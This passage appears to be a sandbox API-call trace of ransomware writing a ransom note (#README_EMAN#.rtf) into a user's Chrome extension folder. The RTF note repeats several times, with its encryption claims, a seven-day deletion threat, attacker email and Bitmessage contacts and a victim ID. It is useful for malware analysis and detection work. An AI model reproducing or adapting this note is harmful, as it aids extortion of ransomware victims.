original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.315] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.316] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.316] CloseHandle (hObject=0x294) returned 1 [0285.316] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0285.316] GetLastError () returned 0x2 [0285.316] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.317] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique 